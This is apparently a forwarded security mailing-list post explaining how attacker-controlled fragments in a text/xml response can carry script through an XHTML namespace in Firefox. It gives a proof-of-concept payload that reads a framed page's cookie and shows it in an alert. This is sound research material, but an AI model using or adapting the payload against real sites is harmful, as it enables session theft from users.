My colleague John Hernandez showed me this trick the other day, which has proven useful as an exploit in many cases. If the site returns XML with a Content-Type: text/xml you’d normally think there’s not much script injection potential. However there most certainly is if an attacker can control just one fragment of the XML.
<?xml version="1.0" encoding="UTF-8" ?> <root> <a> (attacker controlled) </a> </root> If the attacker can control the XML fragment in that part, they could insert something like: <p xmlns='http://www.w3.org/1999/xhtml'> <script> function myfunction() { var doc = window.frames["myFrame"].document; alert(doc.cookie); } </script> <form> <input type=”button” onclick=”myfunction()” value=”Call function” /> </form> <iframe src=”site domain” id=”myFrame” /> </p> By specifying an xml namespace (xmlns) of xhtml, some browsers (Firefox only afaik), will treat the data as html and render it the domain hosting it. You use the iframe to point back to the domain and use its DOM to access the session information, which isn’t available in the original XML DOM. I believe this is desired functionality in Firefox, but we’ve found several exploitable issues in popular applications because of it. [Ph4nt0m] <http://www.ph4nt0m.org/> [Ph4nt0m Security Team] <http://blog.ph4nt0m.org/> [EMAIL PROTECTED] Email: [EMAIL PROTECTED] PingMe: <http://cn.pingme.messenger.yahoo.com/webchat/ajax_webchat.php?yid=hanqin_wu hq&sig=9ae1bbb1ae99009d8859e88e899ab2d1c2a17724> === V3ry G00d, V3ry Str0ng === === Ultim4te H4cking === === XPLOITZ ! === === #_# === #If you brave,there is nothing you cannot achieve.# --~--~---------~--~----~------------~-------~--~----~ 要向邮件组发送邮件,请发到 [email protected] 要退订此邮件,请发邮件至 [EMAIL PROTECTED] -~----------~----~----~----~------~----~------~--~---
<<inline: image001.gif>>
